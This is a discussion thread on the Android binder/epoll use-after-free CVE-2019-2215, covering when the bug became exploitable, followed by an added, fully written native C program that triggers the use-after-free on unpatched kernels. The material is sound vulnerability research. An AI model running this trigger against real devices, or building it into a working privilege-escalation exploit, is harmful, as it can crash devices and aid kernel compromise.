I wonder how long CVE-2019-2215 has been exploitable. Trying to read through the kernel sources to figure out if there was a specific date. I notice that earlier kernels called `binder_free_thread` instead of `binder_thread_release`. https://lore.kernel.org/patchwork/patch/805046/ …
That patch set did a major refactor of binder from a single global lock to incorporate more fine-grained locking (performance reasons). It's possible that binder was free from most cross-thread races before this and the epoll race window was missed during the refactor.
-
Check out https://github.com/marcinguy/CVE-2019-2215/blob/master/README.md#update-1 … (Kernel 3.4.0) If you know how to replicate this using C (native) this can be brought further, since this is the behavior needed for exploitation.
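The race window both posts refer to is the one in the public CVE-2019-2215 trigger: an epoll registration keeps a pointer to the wait queue embedded in the task's `binder_thread`, `BINDER_THREAD_EXIT` frees that `binder_thread` (the path that today goes through `binder_thread_release`), and unregistering the epoll entry then touches the freed memory. As an added example, not code posted by either participant, here is that three-step sequence in native C. It assumes the device lives at `/dev/binder` and derives the ioctl number from the binder UAPI definition `_IOW('b', 8, __s32)` so it builds without `linux/android/binder.h`; on a machine without a binder device it opens nothing and just reports that.

```c
/* Added example: minimal userland trigger for the binder/epoll race
 * (CVE-2019-2215). Not code from the thread's authors. On a host with no
 * binder device the function returns RACE_NO_DEVICE and does nothing else. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* BINDER_THREAD_EXIT as defined in the binder UAPI header: _IOW('b', 8, __s32).
 * Assumption: we spell it out here instead of including linux/android/binder.h.
 * On x86/arm Linux this evaluates to 0x40046208. */
#ifdef _IOW
#define BINDER_THREAD_EXIT _IOW('b', 8, int)
#else
#define BINDER_THREAD_EXIT 0x40046208
#endif

/* Assumed default device path on Android. */
#define DEFAULT_BINDER_PATH "/dev/binder"

/* Return codes so the outcome can be checked without reading stdout. */
enum race_status {
    RACE_SEQUENCE_DONE = 0,  /* all three steps issued to the kernel            */
    RACE_NO_DEVICE    = -1,  /* binder device could not be opened               */
    RACE_SETUP_FAILED = -2   /* epoll or ioctl step failed before the race      */
};

/* Issue the epoll-add / THREAD_EXIT / epoll-del sequence against binder_path. */
int trigger_binder_epoll_race(const char *binder_path)
{
    int binder_fd = open(binder_path, O_RDONLY);
    if (binder_fd < 0)
        return RACE_NO_DEVICE;

    int epfd = epoll_create1(0);
    if (epfd < 0) {
        close(binder_fd);
        return RACE_SETUP_FAILED;
    }

    struct epoll_event ev;
    memset(&ev, 0, sizeof ev);
    ev.events = EPOLLIN;

    /* Step 1: binder_poll() runs for this task and links the wait queue that
     * lives inside its binder_thread onto the new epoll entry. */
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &ev) < 0) {
        close(epfd);
        close(binder_fd);
        return RACE_SETUP_FAILED;
    }

    /* Step 2: release the calling task's binder_thread while epoll still
     * holds a pointer into it. This is the object freed on the
     * binder_thread_release() path discussed above. */
    if (ioctl(binder_fd, BINDER_THREAD_EXIT, 0) < 0) {
        close(epfd);
        close(binder_fd);
        return RACE_SETUP_FAILED;
    }

    /* Step 3: removing the epoll entry walks the wait queue from step 1,
     * which now points into freed memory. On an unpatched kernel this is
     * the use-after-free; on a patched one it is harmless. */
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &ev);

    close(epfd);
    close(binder_fd);
    return RACE_SEQUENCE_DONE;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : DEFAULT_BINDER_PATH;
    int rc = trigger_binder_epoll_race(path);
    if (rc == RACE_NO_DEVICE)
        printf("%s: cannot open (%s); nothing issued\n", path, strerror(errno));
    else if (rc == RACE_SETUP_FAILED)
        printf("%s: setup failed (%s)\n", path, strerror(errno));
    else
        printf("%s: sequence issued\n", path);
    return rc == RACE_SEQUENCE_DONE ? 0 : 1;
}
```

This is a trigger, not an exploit: on a vulnerable kernel the third step corrupts freed `binder_thread` memory, which typically ends in a KASAN splat or a crash rather than anything controlled. Only run it against a device you are prepared to have panic, and compare the result on a kernel with the fix applied, where the same sequence completes uneventfully.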